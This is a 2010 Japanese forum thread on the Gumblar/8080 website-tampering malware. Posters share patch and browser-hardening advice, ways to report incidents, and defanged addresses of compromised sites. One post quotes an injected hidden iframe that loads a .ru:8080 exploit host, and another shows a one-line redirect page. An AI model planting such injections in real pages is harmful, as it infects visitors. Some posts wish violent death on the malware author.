10/07/21 15:13:48
改ざんされたWebページを経由して感染するウイルスの情報・対策スレです
感染しているサイト・ウイルス情報・対策方法・脆弱性情報などをお願いします
一部のウイルス被害が増加して混乱するようなら別スレを立てて誘導してください
基本的な対策としてセキュリティ・アップデートを欠かさないようにしましょう
*** 危険と思われるサイトのアドレスはそのまま貼らないで全ての「.」を「●」に変えてください ***
*** 感染した場合はクリーンインストールと安全なPCからのFTPパスワードの変更を推奨します ***
【前スレ】
【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
スレリンク(sec板)
2:名無しさん@お腹いっぱい。
10/07/21 15:14:27
Gumblar(.x)、8080系ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)~(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
3:名無しさん@お腹いっぱい。
10/07/21 15:15:11
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
■ Adobe Reader(Acrobat,Acrobat Reader)を更新 (使っていないならアンインストール)
URLリンク(get.adobe.com)
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
URLリンク(get.adobe.com)
URLリンク(www.adobe.com)
・Flash Playerのバージョン確認
URLリンク(www.adobe.com)
URLリンク(www.adobe.com)
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
URLリンク(www.adobe.com)
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
URLリンク(www.java.com)
・Javaのバージョン確認
URLリンク(www.java.com)
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
URLリンク(www.apple.com)
■ RealPlayerを更新 (使っていないならアンインストール)
URLリンク(jp.real.com)
4:名無しさん@お腹いっぱい。
10/07/21 15:16:11
ブラウザのjavascriptを無効にする(しっかり対策してれば不要だが、念のためjavascriptはOFFを推奨)
※javascriptをオフにすると、その機能を利用した一部のサイトが見られなくなる可能性があります
●InternetExplorer ツール→インターネットオプション→セキュリティ→
レベルのカスタマイズ→スクリプトのとこ全部無効にチェック
※ActiveXもOFF
●Opera ツール→クイック設定→「javascriptを有効にする」のチェックを外す
●safari 編集→設定→「JavaScriptを有効にする」のチェックを外す
●Sleipnir ツール→Sleipnirのオプション→ビュー(Trident)→
デフォルトセキュリティ欄の「JavaScriptの実行を許可する」のチェックを外す
●Lunascape ツール→設定→セキュリティ→スクリプトの実行を許可のチェック外す
※SP3でIE8を使うと重くなる場合、Sleipnir&IE8Sleipnirエディション
もしくはLunascape5を使うといいようです。
●Firefox ツール→オプション→コンテンツでJavaScript有効にするをはずす
5:名無しさん@お腹いっぱい。
10/07/21 15:16:54
ブラウザ個別のプラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
URLリンク(www.gred.jp)
・aguse
URLリンク(www.aguse.net)
・WebGetter
URLリンク(rd.or.tp)
・Dan's View Source
URLリンク(www.dan.co.uk)
・飛び先のチェック by ぴょん基地の友達
URLリンク(www.kakiko.com)
6:名無しさん@お腹いっぱい。
10/07/21 15:17:59
改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。
■インシデント報告の届出(JPCERT/CC)
URLリンク(www.jpcert.or.jp)
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック URLリンク(www.value-domain.com)
OCN URLリンク(www.ocn.ne.jp)
さくら URLリンク(secure.sakura.ad.jp)
ロリポップ URLリンク(lolipop.jp)
GMOインターネットグループ URLリンク(secure.gmo.jp)
インフォシーク (isweb) URLリンク(portal.faq.rakuten.co.jp)
DION URLリンク(www.auone-net.jp)
NTTPCコミュニケーションズ URLリンク(www.nttpc.ne.jp)
ODN URLリンク(www.odn.ne.jp)
xserver (株式会社ベット) URLリンク(www.xserver.ne.jp)
heteml ヘテムル URLリンク(secure.heteml.jp)
ファーストサーバ URLリンク(www.firstserver.co.jp)
エキサイト URLリンク(www.excite.co.jp)
7:名無しさん@お腹いっぱい。
10/07/21 15:18:40
改竄を受けたら
ウイルス・不正アクセス届出状況について(3月分および第1四半期)
URLリンク(www.ipa.go.jp)
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
・ 問い合わせ用窓口の連絡先
IPAに不正アクセスの届出
URLリンク(www.ipa.go.jp)
8:名無しさん@お腹いっぱい。
10/07/21 16:25:49
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
URLリンク(www.geocities.jp)
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=URLリンク(www.aguse.net)
飛び先のチェック=URLリンク(www.kakiko.com)
WebGetterでソースを見る=URLリンク(rd.or.tp)
WebGetterでタグを除去してソースを見る=URLリンク(rd.or.tp)
WebGetterでリンクを抽出する=URLリンク(rd.or.tp)
Dan's View Sourcelでソースを見る=URLリンク(www.dan.co.uk)
Dr.WEB=URLリンク(online.drweb.com)
9:名無しさん@お腹いっぱい。
10/07/21 16:28:02
>>1-8
テンプレ乙
10:名無しさん@お腹いっぱい。
10/07/21 17:10:35
【Gumblar/GENO】Web改竄ウイルス総合スレ9【8080】
スレリンク(sec板)
なんでこっちじゃいかんの?
11:名無しさん@お腹いっぱい。
10/07/21 17:31:04
998 名前:名無しさん@お腹いっぱい。:2010/07/21(水) 13:27:53
取扱注意
www●kakiyasuhonten●co●jp
999 名前:名無しさん@お腹いっぱい。:2010/07/21(水) 13:52:18
store●nextbusinesssystem●com
www●kidsdrink●jp
12:名無しさん@お腹いっぱい。
10/07/21 17:39:43
ちょw柿安本店てw
13:名無しさん@お腹いっぱい。
10/07/22 15:49:34
どっか stuxnet 取り扱ってるスレ無いかしら?
スレチ承知スマソだけど8080使いそうで怖すぎる
14:名無しさん@お腹いっぱい。
10/07/22 15:59:26
いちおexploit-dbに転がってるけど(コンセプトコードか実物は知らん)、
今のところは標的型だから実物は発電所勤務とかでもなきゃ手に入らないんじゃね。
15:名無しさん@お腹いっぱい。
10/07/23 01:19:56
22日21時に、8080の検体を収集しにいったけんど、特に変化
なし。まぁ感染するウイルスは定期的に差しかえられるので、
毎日が0デイ状態のようなもの・・・
URLリンク(www.virustotal.com)
16:名無しさん@お腹いっぱい。
10/07/23 17:47:55
>>15
検体欲しぃの
17:名無しさん@お腹いっぱい。
10/07/23 20:11:16
URLリンク(internet.watch.impress.co.jp)
コーエーテクモもGumblar感染?
18:名無しさん@お腹いっぱい。
10/07/23 20:15:02
別だろ。Gumblarの目的はbotnetの構築と
botnetの顧客への販売(インチキセキュソフトの販売等)だろうから。
まだZeuSとかのがありえる。
19:名無しさん@お腹いっぱい。
10/07/23 20:21:06
こえー
20:名無しさん@お腹いっぱい。
10/07/23 20:36:25
今のガンブラーってScript系だから、殆ど検出されるんじゃね?
21:名無しさん@お腹いっぱい。
10/07/24 17:35:48
//www.crimsontech.jp/jp/ddp/index.html
22:名無しさん@お腹いっぱい。
10/07/24 17:41:13
無言でURLだけ貼るなよ
23:名無しさん@お腹いっぱい。
10/07/24 17:46:54
//store.nextbusinesssystem.com/
あぅあぅ~
24:名無しさん@お腹いっぱい。
10/07/24 17:48:19
感染サイトならドットを●に変換しろよ
25:夷塚 ◆y0JEaK6O/gDf
10/07/24 19:24:00
>>21
pantscow●ru:8080/CD-ROM●js
凸っておきました
26:名無しさん@お腹いっぱい。
10/07/25 05:18:35
マスターペニス
27:名無しさん@お腹いっぱい。
10/07/25 13:18:20
>>17
SQLインジェクション系攻撃にやられたんじゃねーの?
うちのサイトは、アプリ更新あるごとに外部のセキュリティー企業で診断+Webファイアウォール導入だな
28:名無しさん@お腹いっぱい。
10/07/25 14:37:47
カスペルスキーのGumblar-x駆除ツール
URLリンク(support.kaspersky.co.jp)
を使用したところ
Spliced functions という値が32(ほかの値は0)という結果が表示されました
何度かツールを実行したのですが Spliced functions の値がずっと 1 のままです。
これは既に感染していると考えてよろしいのでしょうか?
29:名無しさん@お腹いっぱい。
10/07/25 18:19:09
カスペスレで聞けよ
30:名無しさん@お腹いっぱい。
10/07/27 19:01:28
Gumblarってなんでruが多いの?
31:名無しさん@お腹いっぱい。
10/07/28 11:11:08
URLリンク(www.securelist.com)
32:名無しさん@お腹いっぱい。
10/07/28 13:59:32
本家gumblarはあちこちなんじゃね。
そもそもzlkon.lv→gumblar.cn→martuz.netだったわけだし。
これらは日本を除外している( >>31 )。
ru多めなのは8080。
33:名無しさん@お腹いっぱい。
10/07/28 14:00:34
martuzもcnだった。
34:名無しさん@お腹いっぱい。
10/07/28 14:34:40
>>31
まだ読んでないけど、実際はUSが多いのかthx
>>32
8080型に多いのは知ってるんだけどさ
TLDがruに偏ってたのはなんでだろうなーと思って
特に理由はないのかね
35:名無しさん@お腹いっぱい。
10/07/28 14:48:07
そりゃRBNあたりがやってんでしょ
36:夷塚 ◆y0JEaK6O/gDf
10/07/29 20:37:57
>>21
www●crimsontech●jp/jp/home●html
> 弊社ホームページに関するお詫びとお知らせ
対応してくれた模様、感染の公表とIPAへの報告に感謝
もうちょっと早かったら言うことなかったなあ
で、本スレどっち…
37:名無しさん@お腹いっぱい。
10/07/30 14:23:39
民間のセキュリティ企業がFBIのサイバー犯罪捜査に協力、スロベニアでハッカーを逮捕
URLリンク(pandajapanblogs.blogspot.com)
38:名無しさん@お腹いっぱい。
10/07/30 22:12:08
ほんと>>37のニュースみたいにGumblarの作者が逮捕されるか射殺されればいいのに…
39:名無しさん@お腹いっぱい。
10/07/30 23:15:08
射殺はかわいそうだろ。
感染PC全部駆除の刑。
40:名無しさん@お腹いっぱい。
10/07/30 23:44:11
565 名前:大人も子供も名無しさんも再び[sage] 投稿日:2010/07/30(金) 21:05:39 ID:pHxHBUIQ
ポケモンの公式ページ、
新しいポケットモンスターのこと知ってますかのページの
左上任天堂ロゴのリンク先おかしいぞ
社員見てるならさっさと直せ
497 名前:名無しさん必死だな[sage] 投稿日:2010/07/30(金) 21:18:47 0
クリックしたらパス求められるな
任天堂HPにもGumblarか?
41:名無しさん@お腹いっぱい。
10/07/30 23:52:11
ウェブ担当のミスじゃねーの?
42:名無しさん@お腹いっぱい。
10/07/31 00:07:55
Gumblar作者を頃したいと思う人は多いだろうな
本当に死ねばいいのに
43:名無しさん@お腹いっぱい。
10/07/31 01:34:47
ゼロデイならともかく既知の脆弱性を放置してやられる方にも問題あると思うぞ
鍵開けてたら泥棒に入られましたみたいな
44:名無しさん@お腹いっぱい。
10/07/31 09:36:27
泥棒より放火魔に例える方があっているな。
放火魔が出ているのに燃えやすいものを置きっぱなしにして
火事になり、近隣まで延焼で大迷惑。
45:名無しさん@お腹いっぱい。
10/08/02 00:10:24
>>43>>44
PC初心者でもすぐにできる対処法だけで完璧に防げるならその物言いも罷り通るんだけどな
現実は日々ゼロデイ
46:名無しさん@お腹いっぱい。
10/08/03 00:41:46
>>43-45
日本には「○○入れてるから大丈夫」という
セキュリティソフト依存症患者(精神疾患)が多いからなw
壁や屋根に穴が空いてたり、鍵や窓が壊れていても
「セコム入ってるから大丈夫(キリッ」
(´・ω・`)
47:名無しさん@お腹いっぱい。
10/08/03 04:17:41
止まらぬサイト改ざん:訪問の心あたりはありませんか~新規告知サイト14件
URLリンク(www.so-net.ne.jp)
48:名無しさん@お腹いっぱい。
10/08/04 10:08:04
Google Chrome(Win版)や、IE8+保護モード(Vista/7)で防げるのに
いまだにXP使ってたりFirefox使ってるアホが多いからこんなに感染者が増えるんだよ
Firefoxが高セキュリティーとかガセネタ流してるアホは全員死刑にすべき
49:名無しさん@お腹いっぱい。
10/08/04 11:00:57
Win7で、Firefox+Noscript/RequestPolicyと、Google Chrome
どっちが安全?
50:名無しさん@お腹いっぱい。
10/08/04 11:16:07
どんな道具を使おうと使う人間がアホなら穴だらけ。
このソフトなら安全と過信している時点でその類だよ。
そもそも100%感染防止なんてできないのに
感染防止策だけで満足しているにわかは多い。
51:名無しさん@お腹いっぱい。
10/08/04 11:33:53
Gumblarのみを考えた場合、感染の確率が低い方はどっち?
RequestPolicyがあれば他ドメインへの通信はしないから外部接続系には安全
アクセス自体しないんだから当たり前
Chromeはアクセスしちゃうけどなんで大丈夫なの?
52:名無しさん@お腹いっぱい。
10/08/04 11:39:44
しつこいぞカス
53:名無しさん@お腹いっぱい。
10/08/04 11:46:59
ググったらなんとなくわかったからいいや
URLリンク(blog.fourteenforty.jp)
スレ汚し失礼
54:名無しさん@お腹いっぱい。
10/08/04 16:33:53
二度と来るなよ
55:名無しさん@お腹いっぱい。
10/08/05 15:09:30
取扱注意
www●1on1●jp
www●untiens●jp
ログにはru8080へ接続した形跡があるけど、aguseだと検出しないという…
ruドメインのjsファイルが呼び出された後に8080サイトへ行ってるみたいだが…
56:名無しさん@お腹いっぱい。
10/08/06 14:31:13
てす
57:コテハン ◆8080adndqg
10/08/06 14:33:25
【陥落サイトのURL悪用厳禁】
■現行型
チャイナ・テーブル 八菜香
398133●com/
当選者発表|柿安創業138周年感謝祭
www●kakiyasuhonten●co●jp/m138th
禿に捕捉(キャッシュ)されてまつw
■トラップ(はぢめて見た)
【楽々茶 LALACHA】:中国茶・茶器・雑貨専門店
www●lalacha●com/
↓
<iframe src=”hxxp://parkperson●ru:8080/index●php?pid=13” width=”0” height=”0” style=”display:none”></iframe>
■旧型(絶賛放置中)
hnfko●web●fc2●com/yama/20080428_shishigatake/index●html
adajo●namidaame●com/
58:名無しさん@お腹いっぱい。
10/08/06 15:03:10
柿安 める凸完了
他は知らんw
59:58
10/08/06 19:33:39
柿安から返信&該当ページの消滅を確認。
--
この度は当社サイトについてご連絡頂き誠にありがとうございました。
~~中略~~
ご連絡を受けまして確認の上速やかに削除いたしました。
重ねてお礼申し上げます。
--
との事。
60:名無しさん@お腹いっぱい。
10/08/08 15:57:11
Webサイトの大規模改ざんでオンラインゲームサイトが標的に
URLリンク(itpro.nikkeibp.co.jp)
61:名無しさん@お腹いっぱい。
10/08/09 16:43:43
dansen.co.jp
これは新しい…
62:名無しさん@お腹いっぱい。
10/08/09 17:12:55
URLリンク(www.dansen.co.jp)
63:名無しさん@お腹いっぱい。
10/08/09 20:58:36
jsのこれ?
/*SOS*/
飛び先はNortonセーフウェブで黒判定。
64:名無しさん@お腹いっぱい。
10/08/09 21:14:48
って、飛び先が真っ黒なのを確認すた。>>63
65:名無しさん@お腹いっぱい。
10/08/09 21:44:46
>>64
× 飛び先が真っ黒なのを確認
○ 飛び先のサイトが真っ黒なのを確認
youhelpnow●ru:8080
66:名無しさん@お腹いっぱい。
10/08/09 21:50:44
ノーガードでこのスレに貼られたサイトよく見てるのにまだ一度もやられたことない
やられるやつって相当アホだろ
67:名無しさん@お腹いっぱい。
10/08/09 22:49:14
>>63
全cssの末尾に何か付いてる
68:名無しさん@お腹いっぱい。
10/08/09 22:56:25
>>67
どもです。
cssにも付くようになったのね。。。
69:名無しさん@お腹いっぱい。
10/08/10 01:08:37
>>67-68
末尾「.txt」にして送付、ひげおじさんからお返事。
> ~.css.txt - Trojan-Downloader.JS.Agent.fnh
>
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
70:名無しさん@お腹いっぱい。
10/08/10 01:23:31
URLリンク(safeweb.norton.com)
これマジ?
71:名無しさん@お腹いっぱい。
10/08/10 01:25:32
[国際110番・20スパム紹介・今月のスパム日記]
URLリンク(www.fuzita.org)
<html><head><script>location = 'URLリンク(xxxxxx)';</script></head></html>
↑こんな一行htmlをUPしてスパムの中継にも使われてる
72:名無しさん@お腹いっぱい。
10/08/10 02:09:24
>>70
\(^o^)/オワタ
73:名無しさん@お腹いっぱい。
10/08/10 02:12:08
>>70
\(^o^)/直リンクw
74:名無しさん@お腹いっぱい。
10/08/10 02:16:41
>>62
Exploit.HTML.HCP.a
75:名無しさん@お腹いっぱい。
10/08/10 10:04:49
>>62
オンラインゲームのパス抜きのもの
ilion.blog47.fc2.com/blog-entry-201.html
www.virustotal.com/jp/analisis/cdff7e34478a48929083674034e97fb773dcf40ccef8e70b6f6a2e56fa34c870-1281401616
>>66
ノーガードとかアホとか関係なくって、ソフトウェアの
脆弱性をふさいでるかどうか
76:名無しさん@お腹いっぱい。
10/08/10 16:18:37
>>61-62 消えたw
77:名無しさん@お腹いっぱい。
10/08/10 19:27:11
注入箇所削除の後告知なしで再開。
この短時間でアプリの穴を修正できるわけがない、と思ったら停止しただけでござる。
2010.08.10 2011年度向け商品開発中のため現在、
商品ページがご覧になれなくなっています。
ご迷惑をおかけしますが何卒ご了承ください。
78:名無しさん@お腹いっぱい。
10/08/10 20:07:37
大量の「禿.js」を装填中w
www●bmisland●net/input/mailmag/detail●asp?MAGID=31&MAGCLS=274&SDFLG=1
79:名無しさん@お腹いっぱい。
10/08/11 05:11:56
URLリンク(2chmatomeluo.web.fc2.com)
80:名無しさん@お腹いっぱい。
10/08/11 09:14:04
>>78と同じやつ
www●dousoukainet●jp/plan●asp
81:名無しさん@お腹いっぱい。
10/08/11 21:18:37
今のところ「禿.js」を防ぐセキュリティソフトは皆無か
82:名無しさん@お腹いっぱい。
10/08/11 22:04:54
また凝りもせず新型を作りやがったのか
本気で作者を頃してやりたいわ
つーか本気で氏ねよ銃殺されろ
作者の国に核落とされて滅んじまえ
83:名無しさん@お腹いっぱい。
10/08/11 23:22:44
>>81
セキュリティソフトは関係ないよ。
現時点での話に限れば、それはIEブラウザ、かつWindows Updateを
しとらん場合に攻撃が成立しうる。
逆に8080やgumblar.xはブラウザの種類は関係ない。
アクセスしてきたブラウザに応じた攻撃コードが生成されるように
なっとる。
84:名無しさん@お腹いっぱい。
10/08/12 01:05:00
>>81
*/yahoo.js*
全部蹴ればええやんw
85:名無しさん@お腹いっぱい。
10/08/12 01:06:35
>>82
ニュースで窃盗事件が流れるたびにそこまで考えてたら疲れないか?
とっくに地球滅びてるよな
86:名無しさん@お腹いっぱい。
10/08/13 14:23:50
311 :('д') ◆yUyb3Tqn92 :2010/08/13(金) 02:29:59 ID:1TXtyzUW0
けいおんのモデルの子も同窓会ネットで顔バレしてるぞ
URLリンク(www.dousoukainet.jp)
だから言わんこっちゃない┐('Д')┌
336 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:37:24 ID:LsxSDH1C0
>>311
これ前にも見たけど
けいおんのモデルになったJKって美人ではあるけどアニメには劣るよな
所詮3次元('A`)
387 :風の谷の名無しさん@実況は実況板で:2010/08/13(金) 02:55:26 ID:z25JrXmm0
>>311
そのページのどこにも写真ないんだけど
411 :('д') ◆yUyb3Tqn92 :2010/08/13(金) 03:09:49 ID:PPZzZ1Px0
('Д')部アッハッハッハはヒャ日波や八はアッハハハyはyヒャヒャヒャhyはyはy早はh!
俺様が貼ったのは最新のウィルスだよ
(<●>Д<●>)踏んだ奴ざまぁあああああああああああああああああああああああああっ!
駆除方法はメール欄参照な:(>w<):
416 :('д') ◆yUyb3Tqn92 :2010/08/13(金) 03:17:09 ID:PPZzZ1Px0
さてウィルス(>>311)も踏ませたことだし
もう寝るお
('д')踏んだ奴は徹夜してリカバリするかLANケーブル外しとくことだな
どちらにせよお前らがウィルス対策の作業している間、俺様はグッスリzZZだお♪
87:名無しさん@お腹いっぱい。
10/08/13 14:53:05
iPhoneが乗っ取られるリスク、「Gumblar攻撃」の併用で具現化する恐れ
URLリンク(www.itmedia.co.jp)
とうとうWinだけの問題じゃなくなってきたな
88:名無しさん@お腹いっぱい。
10/08/13 15:06:17
>>86
だからそういう奴がいるから
結局●とか入れても意味ねーんだよ
なので次からURL貼るときは●抜きを許可する
89:名無しさん@お腹いっぱい。
10/08/13 17:36:26
>>86
これはどういうウイルスですか?
90:名無しさん@お腹いっぱい。
10/08/13 17:41:06
>>86
これ踏んじゃったんだけどJavaScript切っていれば大丈夫?
91:名無しさん@お腹いっぱい。
10/08/13 18:16:38
>>86
これって禿.jsって奴?
Firefox+NoScriptなら踏んでもOK?
92:名無しさん@お腹いっぱい。
10/08/13 19:08:27
>>91
おk
93:名無しさん@お腹いっぱい。
10/08/13 19:30:30
>>89
ネトゲのトロイ。
94:名無しさん@お腹いっぱい。
10/08/13 19:42:34
同窓会ネット aguse、gredどちらも無反応なのだが
95:名無しさん@お腹いっぱい。
10/08/13 20:08:07
gumblarじゃないからじゃね
96:名無しさん@お腹いっぱい。
10/08/13 20:10:01
禿もガンブラーもjs切っておけば問題なし
97:名無しさん@お腹いっぱい。
10/08/13 20:12:14
>>95
ネトゲやってないからよく分からないけど
右上のにID、PASSを入力したらネトゲアカウント取られるってやつ?
98:名無しさん@お腹いっぱい。
10/08/13 20:29:08
というかさ、こんなのに感染する奴って何も設定変えてないIEでインターネットしてる初心者だけ
そんな奴らは絶対IEなんか使っちゃ駄目だろ
別にFirefox厨じゃないけどFirefox+NoScriptでブラウジングしておきゃ感染しないんだから
初心者にはこの組み合わせを薦めるべき
入れるだけでおkなんだから
99:名無しさん@お腹いっぱい。
10/08/13 20:37:55
それは言える
>>2よりも>>4こっちが最優先
100:名無しさん@お腹いっぱい。
10/08/13 20:38:41
>>98
2行で済むことをそんな必死に書く低脳が言っても説得力0なんだぜ
101:名無しさん@お腹いっぱい。
10/08/13 20:41:30
黙れ低脳
102:名無しさん@お腹いっぱい。
10/08/13 20:42:28
そもそもWindowsUpdateしていれば感染しない。
103:名無しさん@お腹いっぱい。
10/08/13 22:25:13
>>98
初心者にそんなもんすすめても
動かなくなったって言ってIEにもどるだけだろ
本人のできる範囲で対策させないと何の意味もない
104:名無しさん@お腹いっぱい。
10/08/13 22:33:48
URLリンク(www.m-sennin.com)
SBMSPAM業者でもgumblar8080判定。
105:名無しさん@お腹いっぱい。
10/08/13 22:53:17
URLリンク(www)<)
106:名無しさん@お腹いっぱい。
10/08/13 23:05:55
あのクソ顔文字まだ捕まってねーのかよ
通報してんのになんでだ!
107:名無しさん@お腹いっぱい。
10/08/13 23:30:14
>>105
ここは鑑定スレじゃない
108:名無しさん@お腹いっぱい。
10/08/13 23:53:16
>>105
そのURLに関しては大丈夫 とだけ書いておく
109:名無しさん@お腹いっぱい。
10/08/14 00:04:11
>>106
器物損壊で被害届け出せば?(笑
110:名無しさん@お腹いっぱい。
10/08/14 01:58:19
>>106
法律に無知な奴は恥ずかしいから発言するなよ
夏厨死ね!
111:コテハン ◆8080adndqg
10/08/14 03:23:55
>>104
古いやつ・・
/AC_RunActiveContent.js
>Last-Modified: Fri, 29 Jan 2010 20:48:14 GMT
112:名無しさん@お腹いっぱい。
10/08/14 09:58:00
あははは調子ぶっこいてるな顔文字
いつまで続くかな
113:名無しさん@お腹いっぱい。
10/08/15 02:40:56
馬鹿だな
何年も前からやってて逮捕されてない有名人なんだから
法律が改正でもされん限り続くだろ
114:名無しさん@お腹いっぱい。
10/08/15 08:17:06
社会情勢の変化ってのはあるよ。
イカタコウィルスもそうだが、今までは手をこまねいていたものを
無理矢理何かにあてはめてタイーホというのはよくある話。
特に、その時点の署長や長官が興味を持つと、強制捜査したり
するようになる。
115:名無しさん@お腹いっぱい。
10/08/15 22:23:27
>>114
お前法律わかってないだろw
無知乙
116:名無しさん@お腹いっぱい。
10/08/15 22:29:36
このスレはミーハーが多いから
ちょっとしたイカタコとか例に出してるとこから見て
なにか面白いニュースがあるとすぐそれを引用したがるんだろうな
リアルで馬鹿な分ネットで知的ぶりたいだけだと思う
117:名無しさん@お腹いっぱい。
10/08/15 22:32:17
おっとあげちまったな
まあ過疎すれだからいいけど
あと「ちょっとした」の部分は抜いて読めよ
118:名無しさん@お腹いっぱい。
10/08/15 22:46:38
さっきURLがあまり晒されなくなったというか以前より少なくなったけど
減ってきてるのか?それともスレ分裂のせいか。
119:コテハン ◆8080adndqg
10/08/15 23:16:58
【陥落サイトのURL悪用厳禁】
■関東学生アメリカンフットボール連盟公式ホームページ
www●kcfa●jp/
※7月21日以前から陥落してるっぽい
■京都大学漫画研究部
kyoto-u-mk●hp●infoseek●co●jp/
※更新履歴の中に紛れ込んでる・・
【改竄】絶賛ループ中w【再改竄】
darkside●higashino●jp/ms●cgi?ShowDiary_file=/lasertank/1281712375&blogid=&t=sketch
※コメント欄
>報告ありがとうございます。
>前回より被害範囲は狭まっています。
>追加対策して、根比べです。
>必ず追い出します。
クリーンインストールしろよwww
120:名無しさん@お腹いっぱい。
10/08/15 23:50:12
>>119
それちょっとアホの子だなあ
根絶させるためにJPCERT/CC経由でやってもらったほうがいいかも
121:名無しさん@お腹いっぱい。
10/08/16 00:04:52
>※更新履歴の中に紛れ込んでる・・
ソースでは末尾なんだろうね。
それより後ろはiswebが勝手に入れる広告なので。
122:名無しさん@お腹いっぱい。
10/08/16 15:07:02
www●ark-web●jp/sandbox/wiki/204●html
叩くとホコリが出てきそうなWeb屋だなw
123:名無しさん@お腹いっぱい。
10/08/16 16:24:52
>>119-120
■7月12日(たぶん改竄記念日)
darkside●higashino●jp/ms.cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1278935970
コメントにセキュリティソフト云々・・・
■7月13日
darkside●higashino●jp/ms.cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1279023797
>『何か謎ですね』
>急に報告が来てるので、試しにウイルスバスター2010試用版を入れてみました。
>特におかしなものは検出されていません。
>written by IDK ←管理人
■8月2日(祝!再改竄)
darkside●higashino●jp/ms●cgi?t=sketch&blogid=&ShowDiary_file=/lasertank/1280752626
>『やられた』
>警告は出てないし心当たりはないしで困ってます。
>といいつつ実は心当たりあるので対策してみます。具体的内容については、攻撃者に情報を与えないため伏せておきます。
>written by IDK ←管理人
■8月13日(祝!再々改竄ww)
>>119を参照
■8月14日
Google先生に「このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。」の称号を授与されました
www.google.com/safebrowsing/diagnostic?site=darkside●higashino●jp&hl=ja
笑いすぎて腹痛えwwwwww
124:名無しさん@お腹いっぱい。
10/08/16 23:15:26
トレンドマイクロオンラインスキャンをしたらJaneStyleのdatが2つMal_Gumblarに感染とのこと
削除をしたらインターネットの方は軽快になったもののこれって見つけて削除をすれば問題のないウィルスですか?
125:名無しさん@お腹いっぱい。
10/08/18 11:57:58
そうね
126:名無しさん@お腹いっぱい。
10/08/19 01:03:06
>>124
専ブラなら誤検出なだけだろ
127:名無しさん@お腹いっぱい。
10/08/19 10:03:06
>>124が快適になったって言ってるんだからいいじゃん!!
128:名無しさん@お腹いっぱい。
10/08/19 23:43:20
それにしても「jsきってりゃおkおk」って、
街歩くためにいちいちボディガードで周り固めればいいじゃんって言ってるようなもんだよな
java使うページも昨今増えてるのに「javaきればおk」って不便さを顧みない思考停止寸前モノとしか……
129:名無しさん@お腹いっぱい。
10/08/20 00:11:21
なんか最後の行で話が変わってるけどJava使ってるサイトそんなに増えてる?
130:コテハン ◆8080adndqg
